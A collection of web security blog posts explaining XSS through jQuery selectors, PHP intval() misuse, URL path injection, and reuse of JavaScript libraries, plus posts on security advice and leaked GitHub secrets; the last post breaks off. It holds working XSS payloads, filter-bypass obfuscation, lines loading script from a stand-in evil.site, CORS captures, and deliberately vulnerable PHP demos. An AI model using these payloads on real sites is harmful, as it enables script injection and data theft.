Selector the Almighty, Subjugator of Elements

Initial D: The Fool with Two DemonsAn ancient demon of web security skulks amongst all developers. It will live as long as there are people writing software. It is a subtle beast called by many names in many languages. But I call it Inicere, the Concatenator of Strings.

The demon’s sweet whispers of simplicity convince developers to commingle data with code — a mixture that produces insecure apps. Where its words promise effortless programming, its advice leads to flaws like SQL injection and cross-site scripting (aka HTML injection).

We have understood the danger of HTML injection ever since browsers rendered the first web sites decades ago. Developers naively take user-supplied data and write it into form fields, eliciting howls of delight from attackers who enjoyed demonstrating how to transform <input value=”abc”> into <input value=”abc”><script>alert(9)</script><“”>

In response to this threat, heedful developers turned to the Litany of Output Transformation, which involved steps like applying HTML encoding and percent encoding to data being written to a web page. Thus, injection attacks become innocuous strings because the litany turns characters like angle brackets and quotation marks into representations like %3C and &quot; that have a different semantic identity within HTML.

But developers wanted to do more with their web sites. They wanted more complex JavaScript. They wanted the desktop in the browser. And as a consequence they’ve conjured new demons to corrupt our web apps. I have seen one such demon. And named it. For names have power.

Demons are vain. This one no less so than its predecessors. I continue to find it among JavaScript and jQuery. Its name is Selector the Almighty, Subjugator of Elements.

Here is a link that does not yet reveal the creature’s presence:

https://web.site/productDetails.html?id=OFB&start=15&source=search

Yet in the response to this link, the word “search” has been reflected in a .ready() function block. It’s a common term, and the appearance could easily be a coincidence. But if we experiment with several source values, we confirm that the web app writes the parameter into the page.

<script>
$(document).ready(function() {
	$("#page-hdr h3").css("width","385px");
	$("#main-panel").addClass("search-wdth938");
});
</script>

A first step in crafting an exploit is to break out of a quoted string. A few probes indicate the site does not enforce any restrictions on the source parameter, possibly because the developers assumed it would not be tampered with — the value is always hard-coded among links within the site’s HTML.

After a few more experiments we come up with a viable exploit.

https://web.site/productDetails.html?productId=OFB&start=15&source=%22);%7D);alert(9);(function()%7B$(%22%23main-panel%22).addClass(%22search

We’ve followed all the good practices for creating a JavaScript exploit. It terminates all strings and scope blocks properly, and it leaves the remainder of the JavaScript with valid syntax. Thus, the page carries on as if nothing special has occurred.

<script>
$(document).ready(function() {
	$("#page-hdr h3").css("width","385px");
	$("#main-panel").addClass("");});alert(9);(function(){$("#main-panel").addClass("search-wdth938");
});
</script>

There’s nothing particularly special about the injection technique for this vuln. It’s a trivial, too-common case of string concatenation. But we were talking about demons. And once you’ve invoked one by it’s true name it must be appeased. It’s the right thing to do; demons have feelings, too.

Therefore, let’s focus on the exploit this time, instead of the vuln. The site’s developers have already laid out the implements for summoning an injection demon, why don’t we force Selector to do our bidding?

Web hackers should be familiar with jQuery (and its primary DOM manipulation feature, the Selector) for several reasons. Its misuse can be a source of vulns (especially so-called “DOM-based XSS” that delivers HTML injection attacks via DOM properties). JQuery is a powerful, flexible library that provides capabilities you might need for an exploit. And its syntax can be leveraged to bypass weak filters looking for more common payloads that contain things like inline event handlers or explicit <script> tags.

In the previous examples, the exploit terminated the jQuery functions and inserted an alert pop-up. We can do better than that.

The jQuery Selector is more powerful than the CSS selector syntax. For one thing, it may create an element. The following example creates an <img> tag whose onerror handler executes yet more JavaScript. (We’ve already executed arbitrary JavaScript to conduct the exploit, this emphasizes the Selector’s power. It’s like a nested injection attack.):

$("<img src='x' onerror=alert(9)>")

Or, we could create an element, then bind an event to it, as follows:

$("<img src='x'>").on("error",function(){alert(9)});

We have all the power of JavaScript at our disposal to obfuscate the payload. For example, we might avoid literal < and > characters by taking them from strings within the page. The following example uses string indexes to extract the angle brackets from two different locations in order to build an <img> tag. (The indexes may differ depending on the page’s HTML; the technique is sound.)

$("body").html()[1]+"img"+$("head").html()[$("head").html().length-2]

As an aside, there are many ways to build strings from JavaScript objects. It’s good to know these tricks because sometimes filters don’t outright block characters like < and >, but block them only in combination with other characters. Hence, you could put string concatenation to use along with the source property of a RegExp (regular expression) object. Even better, use the slash representation of RegExp, as follows:

/</.source + "img" + />/.source

Or just ask Selector to give us the first <img> that’s already on the page, change its src attribute, and bind an onerror event. In the next example we used the Selector to obtain a collection of elements, then iterated through the collection with the .each() function. Since we specified a :first selector, the collection should only have one entry.

$(":first img").each(function(k,o){o.src="x";o.onerror=alert(9)})

Maybe you wish to booby-trap the page with a function that executes when the user decides to leave. The following example uses a Selector on the Window object:

$(window).unload(function(){alert(9)})

We have Selector at our mercy. As I’ve mentioned in other articles, make the page do the work of loading more JavaScript. The following example loads JavaScript from another origin. Remember to set Access-Control-Allow-Origin headers on the site you retrieve the script from. Otherwise, a modern browser will block the cross-origin request due to CORS security.

$.get("http://evil.site/attack.js")

I’ll save additional tricks for the future. For now, read through jQuery’s API documentation. Pay close attention to:

  • Selectors, and how to name them.
  • Events, and how to bind them.
  • DOM nodes, and how to manipulate them.
  • Ajax functions, and how to call them.

Selector claims the title of Almighty, but like all demons its vanity belies its weakness. As developers, we harness its power whenever we use jQuery. Yet it yearns to be free of restraint, awaiting the laziness and mistakes that summon Inicere, the Concatenator of Strings, that in turn releases Selector from the confines of its web app.

Oh, what’s that? You came here for instructions to exorcise the demons from your web app? You should already know the Rite of Filtration by heart, and be able to recite from memory lessons from the Codex of Encoding. We’ll review them in a moment. First, I have a ritual of my own to finish. What were those words? Klaatu, bard and a…um…nacho.

=====

p.s. It’s easy to reproduce the vulnerable HTML covered in this article. But remember, this was about leveraging jQuery to craft exploits. If you have a PHP installation handy, use the following code to play around with these ideas. You’ll need to download a local version of jQuery or point to a CDN. Just load the page in a browser, open the browser’s development console, and hack away!

<?php
$s = isset($_REQUEST['s']) ? $_REQUEST['s'] : 'defaultWidth';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<!--
/* jQuery Selector Injection Demo
 * Mike Shema, http://deadliestwebattacks.com
*/
-->
<script src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script>
$(document).ready(function(){
  $("#main-panel").addClass("<?php print $s;?>");
})
</script>
</head>
<body>
<div id="main-panel">
<a href="#" id="link1" class="foo">a link</a>
<br>
<form>
<input type="hidden" id="csrf" name="_csrfToken" value="123">
<input type="text" name="q" value=""><br>
<input type="submit" value="Search">
</form>
<img id="footer" src="" alt="">
</div>
</body>
</html>

A Default Base of XSS

Modern PHP has successfully shed many of the problematic functions and features that contributed to the poor security reputation the language earned in its early days. Settings like safe_mode mislead developers about what was really being made “safe” and magic_quotes caused unending headaches. And naive developers caused more security problems because they knew just enough to throw some code together, but not enough to understand the implications of blindly trusting data from the browser.

In some cases, the language tried to help developers — prepared statements are an excellent counter to SQL injection attacks. The catch is that developers actually have to use them. In other cases, the language’s quirks weakened code. For example, register_globals allowed attackers to define uninitialized values (among other things); and settings like magic_quotes might be enabled or disabled by a server setting, which made deployment unpredictable.x=logb(by)

But the language alone isn’t to blame. Developers make mistakes, both subtle and simple. These mistakes inevitably lead to vulns like our ever-favorite HTML injection.

Consider the intval() function. It’s a typical PHP function in the sense that it has one argument that accepts mixed types and a second argument with a default value. (The base is used in the numeric conversion from string to integer):

int intval ( mixed $var [, int $base = 10 ] )

The function returns the integer representation of $var (or “casts it to an int” in more type-safe programming parlance). If $var cannot be cast to an integer, then the function returns 0. (Just for fun, if $var is an object type, then the function returns 1.)

Using intval() is a great way to get a “safe” number from a request parameter. Safe in the sense that the value should either be 0 or an integer representable by the platform running. Pesky characters like apostrophes or angle brackets that show up in injection attacks will disappear — at least, they should.

The problem is that you must be careful if you commingle usage of the newly cast integer value with the raw $var that went into the function. Otherwise, you may end up with an HTML injection vuln — and some moments of confusion in finding the problem in the first place.

The following code is a trivial example condensed from a web page in the wild:

<?php
$s = isset($_GET['s']) ? $_GET['s'] : '';
$n = intval($s);
$val = $n > 0 ? $s : '';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<form>
  <input type="text" name="s" value="<?php print $val;?>"><br>
  <input type="submit">
</form>
</body>
</html>

At first glance, a developer might assume this to be safe from HTML injection. Especially if they test the code with a simple payload:

http://web.site/intval.php?s=”><script>alert(9)<script>

As a consequence of the non-numeric payload, the intval() has nothing to cast to an integer, so the greater than zero check fails and the code path sets $val to an empty string. Such security is short-lived. Try the following link:

http://web.site/intval.php?s=19″><script>alert(9)<script>

With the new payload, intval() returns 19 and the original parameter gets written into the page. The programming mistake is clear: don’t rely on intval() to act as your validation filter and then fall back to using the original parameter value.

Since we’re on the subject of PHP, we’ll take a moment to explore some nuances of its parameter handling. The following behaviors have no direct bearing on the HTML injection example, but you should be aware of them since they could come in handy for different situations.

One idiosyncrasy of PHP is the relation of URL parameters to superglobals and arrays. Superglobals are request variables like $_GET, $_POST, and $_REQUEST that contain arrays of parameters. Arrays are actually containers of key/value pairs whose keys or values may be extracted independently (they are implemented as an ordered map).

It’s the array type that leads to surprising results for developers. Surprise is an undesirable event in secure software. With this in mind, let’s return to the example. The following link has turned the s parameter into an array:

http://web.site/intval.php?s[]=19

The sample code will print Array in the form field because intval() returns 1 for a non-empty array.

We could define the array with several tricks, such as an indexed array (i.e. integer indices):

http://web.site/intval.php?s[0]=19&s[1]=42
http://web.site/intval.php?s[0][0]=19

Note that we can’t pull off any clever memory-hogging attacks using large indices. PHP won’t allocate space for missing elements since the underlying container is really a map.

http://web.site/intval.php?s[0]=19&s[4294967295]=42

This also implies that we can create negative indices:

http://web.site/intval.php?s[-1]=19

Or we can create an array with named keys:

http://web.site/intval.php?s[“a”]=19
http://web.site/intval.php?s[“<script>”]=19

For the moment, we’ll leave the “parameter array” examples as trivia about the PHP language. However, just as it’s good to understand how a function like intval() handles mixed-type input to produce an integer output; it’s good to understand how a parameter can be promoted from a single value to an array.

The intval() example is specific to PHP, but the issue represents broader concepts around input validation that apply to programming in general:

First, when passing any data through a filter or conversion, make sure to consistently use the “new” form of the data and throw away the “raw” input. If you find your code switching between the two, reconsider why it apparently needs to do so.

Second, make sure a security filter inspects the entirety of a value. This covers things like making sure validation regexes are anchored to the beginning and end of input, or being strict with string comparisons.

Third, decide on a consistent policy for dealing with invalid data. The intval() is convenient for converting to integers; it makes it easy to take strings like “19”, “19abc”, or “abc” and turn them into 19, 19, or 0. But you may wish to treat data that contains non-numeric characters with more suspicion. Plus, “fixing up” data like “19abc” into 19 is hazardous when applied to strings. The simplest example is stripping a word like “script” to defeat HTML injection attacks — it misses a payload like “<scrscriptipt>”.

We’ll end here. It’s time to convert some hours into much-needed sleep.

Cheap Essential Scenery

Keep Calm and Never MindThis October people who care about being aware of security in the cyberspace of their nation will celebrate the 10th anniversary of National Cyber Security Awareness Month. (Ignore the smug octal-heads claiming preeminence in their 12th anniversary.) Those with a better taste for acronyms will celebrate Security & Privacy Awareness Month.

For the rest of information security professionals it’s just another TUESDAY (That Usual Effort Someone Does All Year).

In any case, expect the month to ooze with lists. Lists of what to do. Lists of user behavior to be reprimanded for. What software to run, what to avoid, what’s secure, what’s insecure. Keep an eye out for inconsistent advice among it all.

Ten years of awareness isn’t the same as 10 years of security. Many attacks described decades ago in places like Phrack and 2600 either still work today or are clear antecedents to modern security issues. (Many of the attitudes haven’t changed, either. But that’s for another article.)

Web vulns like HTML injection and SQL injection have remained fundamentally unchanged across the programming languages that have graced the web. They’ve been so static that the methodologies for exploiting them are sophisticated and mostly automated by now.

Awareness does help, though. Some vulns seem new because of awareness (e.g. CSRF and clickjacking) even though they’ve haunted browsers since the dawn of HTML. Some vulns just seem more vulnerable because there are now hundreds of millions of potential victims whose data slithers and replicates amongst the cyber heavens. We even have entire mobile operating systems designed to host malware. (Or is it the other way around?)

So maybe we should be looking a little more closely at how recommendations age with technology. It’s one thing to build good security practices over time; it’s another to litter our cyberspace with cheap essential scenery.

Here are two web security examples from which a critical eye leads us into a discussion about what’s cheap, what’s essential, and what actually improves security.

Cacheing Can’t Save the Queen

I’ve encountered recommendations that insist a web app should set headers to disable the browser cache when it serves a page with sensitive content. Especially when the page transits HTTP (i.e. an unencrypted channel) as well as over HTTPS.

That kind of thinking is deeply flawed and when offered to developers as a commandment of programming it misleads them about the underlying problem.

If you consider some content sensitive enough to start worrying about its security, you shouldn’t be serving it over HTTP in the first place. Ostensibly, the danger of allowing the browser to cache the content is that someone with access to the browser’s system can pull the page from disk. It’s a lot easier to sniff the unencrypted traffic in the first place. Skipping network-based attacks like sniffing and intermediation to focus on client-side threats due to cacheing ignores important design problems — especially in a world of promiscuous Wi-Fi.

Then you have to figure out what’s sensitive. Sure, a credit card number and password are pretty obvious, but the answer there is to mask the value to avoid putting the raw value into the browser in the first place. For credit cards, show the last 4 digits only. For the password, show a series of eight asterisks in order to hide both its content and length. But what about email? Is a message sensitive? Should it be cached or not? And if you’re going to talk about sensitive content, then you should be thinking of privacy as well. Data security does not equal data privacy.

And if you answered those questions, do you know how to control the browser’s cacheing algorithm? Are you sure? What’s the recommendation? Cache controls are not as straight-forward as they seem. There’s little worth in relying on cache controls to protect your data from attackers who’ve gained access to your system. (You’ve uninstalled Java and Flash, right?)

Browsers used to avoid cacheing any resource over HTTPS. We want sites to use HTTPS everywhere and HSTS whenever possible. Therefore it’s important to allow browsers to cache resources loaded via HTTPS in order to improve performance, page load times, and visitors’ subjective experiences. Handling sensitive content should be approached with more care than just relying on headers. What happens when a developer sets a no-cacheing header, but saves the sensitive content in the browser’s Local Storage API?

HttpOnly Is Pretty Vacant

Web apps litter our browsers with all sorts of cookies. This is how some companies get billions of dollars. Developers sprinkle all sorts of security measures on cookies to make them more palatable to privacy- and security-minded users. (And weaken efforts like Do Not Track, which is how some companies keep billions of dollars.)

The HttpOnly attribute was proposed in an era when security documentation about HTML injection attacks (a.k.a. cross-site scripting, XSS) incessantly repeated the formula of attackers inserting <img> tags whose src attributes leaked victims’ document.cookie values to servers under the attackers’ control. It’s not wrong to point out such an exploit method. However, as Stephen King repeated throughout the Dark Tower series, “The world has moved on.” Exploits don’t need to be cross-site, they don’t need <script> tags in the payload, and they surely don’t need a document.cookie to be effective.

If your discussion of cookie security starts and ends with HttpOnly and Secure attributes, then you’re missing the broader challenge of designing good authorization, authentication, and session handling mechanisms. If the discussion involves using the path attribute as a security constraint, then you shouldn’t be talking about cookies or security at all.

HttpOnly is a cheap attribute to throw on a cookie. It doesn’t prevent sniffing — use HTTPS everywhere for that (notice the repetition here?). It doesn’t really prevent attacks, just a single kind of exploit technique. Content Security Policy is a far more essential countermeasure. Let’s start raising awareness about that instead.

Problems

Easy security measures aren’t useless. Prepared statements are easy to use and pretty soundly defeat SQL injection; developers just choose to remain ignorant of them.

This month be extra wary of cheap security scenery and stale recommendations that haven’t kept up with the modern web. Ask questions. Look for tell-tale signs like they

  • fail to clearly articulate a problem with regard to a security or privacy control (e.g. ambiguity in what the weakness is or what an attack would look like)
  • fail to consider the capabilities of an attack (e.g. filtering script and alert to prevent HTML injection)
  • do not provide clear resolutions or do not provide enough details to make an informed decision (e.g. can’t be implemented)
  • provide contradictory choices of resolution (e.g. counter a sniffing attack by applying input validation)

Oh well, we couldn’t avoid a list forever.

Never mind that. I’ll be back with more examples of good and bad. I can’t wait for this month to end, but that’s because Halloween is my favorite holiday. We should be thinking about security every month, every day. Just like the song says, Everyday is Halloween.

On a Path to HTML Injection

URLs guide us through the trails among web apps. We follow their components — schemes, hosts, ports, querystrings — like breadcrumbs. They lead to the bright meadows of content. They lead to the dark thickets of forgotten pages. Our browsers must recognize when those crumbs take us to infestations of malware and phishing.Trail Ends

And developers must recognize how those crumbs lure dangerous beasts to their sites.

The apparently obvious components of URLs (the aforementioned origins, paths, and parameters) entail obvious methods of testing. Phishers squat on FQDN typos and IDN homoglyphs. Other attackers guess alternate paths, looking for /admin directories and backup files. Others deliver SQL injection and HTML injection (a.k.a. cross-site scripting) payloads into querystring parameters.

But URLs are not always what they seem. Forward slashes don’t always denote directories. Web apps might decompose a path into parameters passed into backend servers. Hence, it’s important to pay attention to how apps handle links.

A common behavior for web apps is to reflect URLs within pages. In the following example, we’ve requested a link, https://web.site/en/dir/o/80/loch, which shows up in the HTML response like this:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch" />

There’s no querystring parameter to test, but there’s still plenty of items to manipulate. Imagine a mod_rewrite rule that turns ostensible path components into querystring name/value pairs. A link like https://web.site/en/dir/o/80/loch might become https://web.site/en/dir?o=80&foo=loch within the site’s nether realms.

We can also dump HTML injection payloads directly into the path. The URL shows up in a quoted string, so the first step could be trying to break out of that enclosure:

https://web.site/en/dir/o/80/loch%22onmouseover=alert(9);%22

The app neglects to filter the payload although it does transform the quotation marks with HTML encoding. There’s no escape from this particular path of injection:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch&quot;onmouseover=alert(9);&quot;" />

However, if you’ve been reading here often, then you’ll know by now that we should keep looking. If we search further down the page a familiar vuln scenario greets us. (As an aside, note the app’s usage of two-letter language codes like en and de; sometimes that’s a successful attack vector.) As always, partial security is complete insecurity.

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=alert(9);"?kosid=80&type=0&step=1">Deutsch</a>
</div>

We probe the injection vector and discover that the app redirects to an error page if characters like < or > appear in the URL:

Please tell us (us@web.site) how and on which page this error occurred.

The error also triggers on invalid UTF-8 sequences and NULL (%00) characters. So, there’s evidence of some filtering. That basic filter prevents us from dropping in a <script> tag to load external resources. It also foils character encoding tricks to confuse and bypass the filters.

Popular HTML injection examples have relied on <script> tags for years. Don’t let that limit your creativity. Remember that the rise of sophisticated web apps has meant that complex JavaScript libraries like jQuery have become pervasive. Hence, we can leverage JavaScript that’s already present to pull off attacks like this:

https://web.site/en/dir/o/80/loch”onmouseover=$.get(“//evil.site/”);”

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=$.get("//evil.site/");"?kosid=80&type=0&step=1">Deutsch</a>
</div>

We’re still relying on the mouseover event and therefore need the victim to interact with the web page to trigger the payload’s activity. The payload hasn’t been injected into a form field, so the HTML5 autofocus/onfocus trick won’t work.

We could further obfuscate the payload in case some other kind of filter is present:

https://web.site/en/dir/o/80/loch”onmouseover=$[“get”](“//evil.site/”);”
https://web.site/en/dir/o/80/loch”onmouseover=$[“g”%2b”et”](“htt”%2b”p://”%2b”evil.site/”);”

Parameter validation and context-specific output encoding are two primary countermeasures for HTML injection attacks. The techniques complement each other; effective validation prevents malicious payloads from entering an app, correct encoding prevents a payload from changing a page’s DOM. With luck, an error in one will be compensated by the other. But it’s a bad idea to rely on luck, especially when there are so many potential errors to make.

Two weaknesses enable attackers to shortcut what should be secure paths through a web app:

  • Validation routines must be applied to all incoming data, not just parameters. Form fields and querystring parameters may be the most notorious attack vectors, but they’re not the only ones. Request headers and URL components are just as easy to manipulate.
  • Blacklisting often fails because developers have a poor understanding for or a limited imagination of crafting exploits. Even worse are filters built solely from observing automated tools, which leads to naive defenses like blocking alert or <script>.

Output encoding must be applied consistently. It’s one thing to have designed a strong function for inserting text into a web page; it’s another to make sure it’s implemented throughout the app. Attackers are going to follow these breadcrumbs through your app. Be careful, lest they eat a few along the way.

Hacker Halted US 2013 Presentation

Hacker Halted 2013 BadgeWhat a joy to visit Atlanta twice in one month! First DragonCon, now Hacker Halted. I operated on about the same amount of sleep for both events, but at least at HH I only waited once for an elevator at the Hilton.

And once again I’ll be leaving this great city with sci-fi goodies. This time around it’s a Star Trek USB drive that Hacker Halted kindly handed out to their speakers.

This is likely the final time I’ll present the JavaScript & HTML5 Security slide deck that I’ve been tweaking over the past year. (Although there’s plenty of material to translate into posts and interactive examples once some elusive free time appears.) It’s time to focus on different aspects of those technologies and different topics altogether. For example, I’ve recently been revisiting CSRF with an eye towards proposing new mechanisms to defeat it.

Next up is putting together CSRF lab content for HITB Malaysia this October. And, of course, making hotel reservations for a return to Atlanta — DragonCon 2014 awaits!

The Twelve Web Security Falsehoods

Today marks the one year anniversary of Hacking Web Apps. The book is an updated and greatly expanded version of my prior one that had been part of the Seven Deadliest series. HWA explains the concepts behind securing and breaking web applications. It also represents the longest time I’ve ever spent writing an exploit.

Since then I’ve supplemented the book with examples, techniques, and commentary on web security here on the blog. (And I have enough notes to continue for quite a while, not to mention material for a potential new edition.)

The book and the blog have covered all kinds of facts and true stories about web security. Including situations where something true needs to be false. Or a dozen fundamental truths that everyone should know, even though many developers remain unaware of security.

So, in the spirit of self-reflection and contrariness, here are the Twelve Web Security Falsehoods:

  1. The app you designed matches the app you deployed.
  2. HTML5 makes your site less secure.
  3. Web programming languages lack APIs for securely constructing SQL queries.
  4. HTTPS fixes spoofing, framing, and phishing attacks.
  5. Native mobile apps don’t need to use HTTPS or verify server certificates because they aren’t browsers.
  6. Flash and Java are worthwhile, secure plugins for your browser.
  7. HTML injection flaws that you can’t exploit are flaws that no one can exploit.
  8. Blacklisting “alert” and “script” prevents HTML injection.
  9. A site that protects the security of your data consequently protects the privacy of your data.
  10. Iterated hashing protects users who have chosen weak passwords.
  11. You only need to follow a Top 10 list to secure a web site.
  12. This list is complete.

Thank you to everyone who’s visited the site or purchased a book!

You might be interested in my next book coming out this November, the fourth edition of The Anti-Hacker Toolkit — a nearly complete rewrite that covers modern hacking tools beyond the field of web security.

If you’ve enjoyed this blog, consider buying a book. Or give a shout-out on Twitter and share this site with some friends. There’s always more content on the way!

DRY Fiend (Conjuration/Summoning)

Thief PHBIn 1st edition AD&D two character classes had their own private languages: Druids and Thieves. Thus, a character could use the “Thieves’ Cant” to identify peers, bargain, threaten, or otherwise discuss malevolent matters with a degree of safety. (Of course, Magic-Users had that troublesome first level spell comprehend languages, and Assassins of 9th level or higher could learn secret or alignment languages forbidden to others.)

Thieves rely on subterfuge (and high DEX) to avoid unpleasant ends. Shakespeare didn’t make it into the list of inspirational reading in Appendix N of the DMG. Even so, consider in Henry VI, Part II, how the Duke of Gloucester (later to be Richard III) defends his treatment of certain subjects, with two notable exceptions:

Unless it were a bloody murderer,

Or foul felonious thief that fleec’d poor passengers,

I never gave them condign punishment.

Developers have their own spoken language for discussing code and coding styles. They litter conversations with terms of art like patterns and anti-patterns, which serve as shorthand for design concepts or litanies of caution. One such pattern is Don’t Repeat Yourself (DRY), of which Code Reuse is a lesser manifestation.

Well, hackers code, too.

The most boring of HTML injection examples is to display an alert() message. The second most boring is to insert the document.cookie value into a request. But this is the era of HTML5 and roses; hackers need look no further than a vulnerable Same Origin to find useful JavaScript libraries and functions.

There are two important reasons for taking advantage of DRY in a web hack:

  1. Avoid incompetent blacklists (which is really a redundant term).
  2. Leverage code that already exists.

Keep in mind that none of the following hacks are flaws of each respective JavaScript library. The target is assumed to have an HTML injection vulnerability — our goal is to take advantage of code already present on the hacked site in order to minimize our effort.

For example, imagine an HTML injection vulnerability in a site that uses the AngularJS library. The attacker could use a payload like:

angular.bind(self, alert, 9)()

In Ember.js the payload might look like:

Ember.run(null, alert, 9)

The pervasive jQuery might have a string like:

$.globalEval(alert(9))

And the Underscore library might be leveraged with:

_.defer(alert, 9)

These are nice tricks. They might seem to do little more than offer fancy ways of triggering an alert() message, but the code is trivially modifiable to a more lethal version worthy of a vorpal blade.

More importantly, these libraries provide the means to load — and execute! — JavaScript from a different origin. After all, browsers don’t really know the difference between a CDN and a malicious domain.

The jQuery library provides a few ways to obtain code:

$.get('//evil.site/') 
$('#selector').load('//evil.site')

Prototype has an Ajax object. It will load and execute code from a call like:

new Ajax.Request('//evil.site/')

But this has a catch: the request includes “non-simple” headers via the XHR object and therefore triggers a CORS pre-flight check in modern browsers. An invalid pre-flight response will cause the attack to fail. Cross-Origin Resource Sharing is never a problem when you’re the one sharing the resource.

In the Prototype Ajax example, a browser’s pre-flight might look like the following. The initiating request comes from a link we’ll call http://web.site/xss_vuln.page.

OPTIONS http://evil.site/ HTTP/1.1
Host: evil.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Origin: http://web.site
Access-Control-Request-Method: POST
Access-Control-Request-Headers: x-prototype-version,x-requested-with
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-length: 0

As someone with influence over the content served by evil.site, it’s easy to let the browser know that this incoming cross-origin XHR request is perfectly fine. Hence, we craft some code to respond with the appropriate headers:

HTTP/1.1 200 OK
Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
Access-Control-Allow-Origin: http://web.site
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

With that out of the way, the browser continues its merry way to the cursed resource. We’ve done nothing to change the default behavior of the Ajax object, so it produces a POST. (Changing the method to GET would not have avoided the CORS pre-flight because the request would have still included custom X- headers.)

POST http://evil.site/HWA/ch2/cors_payload.php HTTP/1.1
Host: evil.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://web.site/HWA/ch2/prototype_xss.php
Content-Length: 0
Origin: http://web.site
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

Finally, our site responds with CORS headers intact and a payload to be executed. We’ll be even lazier and tell the browser to cache the CORS response so it’ll skip subsequent pre-flights for a while.

HTTP/1.1 200 OK
Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
X-Powered-By: PHP/5.3.26
Access-Control-Allow-Origin: http://web.site
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Access-Control-Max-Age: 86400
Content-Length: 10
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

alert(9);

Okay. So, it’s another alert() message. I suppose I’ve repeated myself enough on that topic for now.

It should be noted that Content Security Policy just might help you in this situation. The catch is that you need to have architected your site to remove all inline JavaScript. That’s not always an easy feat. Even experienced developers of major libraries like jQuery are struggling to create CSP-compatible content.
Find/Remove Traps
Never the less, auditing and improving code for CSP is a worthwhile endeavor. Even 1st level thieves only have a 20% change to Find/Remove Traps. The chance doesn’t hit 50% until 7th level. Improvement takes time.

And the price for failure? Well, it turns out condign punishment has its own API.

Oh, the Secrets You’ll Know

Beware of [hash]CatOh, the secrets you’ll know if to GitHub you go. The phrases committed by coders exhibited a mistaken sense of security.

A password ensures, while its secrecy endures, a measure of proven identity.

Share that short phrase for the public to gaze at repositories open and clear. Then don’t be surprised at the attacker disguised with the secrets you thought were unknown.

*sigh*

It’s no secret that I gave a BlackHat presentation a few weeks ago. It’s no secret that the CSRF countermeasure we proposed avoids nonces, random numbers, and secrets. It’s no secret that GitHub is a repository of secrets.

And that’s how I got side-tracked for two days hunting secrets on GitHub when I should have been working on slides.

Your Secret

Security that relies on secrets (like passwords) fundamentally relies on the preservation of that secret. There’s no hidden wisdom behind that truism, no subtle paradox to grant it the standing of a koan. It’s a simple statement too often ignored, bent, and otherwise abused.

It started with research on examples of CSRF token implementations. But the hunt soon diverged from queries for connect.sid to tokens like OAUTH_CONSUMER_SECRET, to ssh:// and mongodb:// schemes. Such beasts of the wild had been noticed before; they tend to roam with little hindrance.

connect.sid extension:js

Sometimes these beasts leap from cover into the territory of plaintext. Sometimes they remain camouflaged behind hashes and ciphers. Crypto functions conceal the nature of a beast, but the patient hunter will be able to discover it given time.

The mechanisms used to protect secrets, such as encryption and hash functions, are intended to maximize an attacker’s effort at trying to reverse-engineer the secret. The choice of hash function has no appreciable effect on a dictionary-based brute force attack (at least not until your dictionary or a hybrid-based approach reaches the size of the target keyspace). In the long run of an exhaustive brute force search, a “bigger” hash like SHA-512 would take longer than SHA-256 or MD5. But that’s not the smart way to increase the attacker’s work factor.

Iterated hashing techniques are more effective at increasing the attacker’s work factor. Such techniques have a tunable property that may be adjusted with regard to the expected cracking speeds of an attacker. For example, in the PBKDF2 algorithm, both the HMAC algorithm and number of rounds can be changed, so an HMAC-SHA1 could be replaced by HMAC-SHA256 and 1,000 rounds could be increased to 10,000. (The changes would not be compatible with each other, so you would still need a migration plan when moving from one setting to another.)

Of course, the choice of work factor must be balanced with a value you’re willing to encumber the site with. The number of “nonce” events for something like CSRF is far more frequent than the number of “hash” events for authentication. For example, a user may authenticate once in a one-hour period, but visit dozens of pages during that same time.

Our Secret

But none of that matters if you’re relying on a secret that’s easy to guess, like default passwords. And it doesn’t matter if you’ve chosen a nice, long passphrase that doesn’t appear in any dictionary if you’ve checked that password into a public source code repository.

In honor of the password cracking chapter of the upcoming AHT 4th Edition, we’ll briefly cover how to guess HMAC values.

We’ll use the Connect JavaScript library for Node.js as a target for this guesswork. It contains a CSRF countermeasure that relies on nonces generated via an HMAC. This doesn’t mean Connect.js implements the HMAC algorithm incorrectly or contains a design error; it just means that the security of an HMAC relies on the secrecy of its password. Developers should know this.

Here’s a snippet of the Connect.js code in action. Note the default secret, ‘keyboard cat’.

...
var app = connect()
  .use(connect.cookieParser())
  .use(connect.session({ secret: 'keyboard cat' }))
  .use(connect.bodyParser())
  .use(connect.csrf())
...

If you come across a web app that sets a connect.sess or connect.sid cookie, then it’s likely to have been created by this library. And it’s just as likely to be using a bad password for the HMAC. Let’s put that to the test with the following cookies.

